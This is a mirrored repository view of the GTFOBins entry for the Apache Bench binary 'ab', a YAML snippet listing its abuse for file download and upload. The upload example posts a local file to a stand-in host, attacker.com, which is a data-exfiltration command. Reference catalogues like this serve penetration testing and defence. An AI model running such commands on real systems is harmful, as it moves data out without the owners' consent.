1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/ab
Andrea Cardaci 665a248219 Clarify and rename known network protocols
The rationale is that download/upload determine the data flow, but not the
connection initiator, which can be either party.
2025-12-26 00:56:43 +01:00

20 lines
338 B
Plaintext

---
functions:
download:
- code: |-
ab -v2 http://attacker.com/path/to/input-file
contexts:
sudo:
suid:
unprivileged:
sender: http-server
upload:
- code: |-
ab -p /path/to/input-file http://attacker.com/
contexts:
sudo:
suid:
unprivileged:
receiver: http-server
...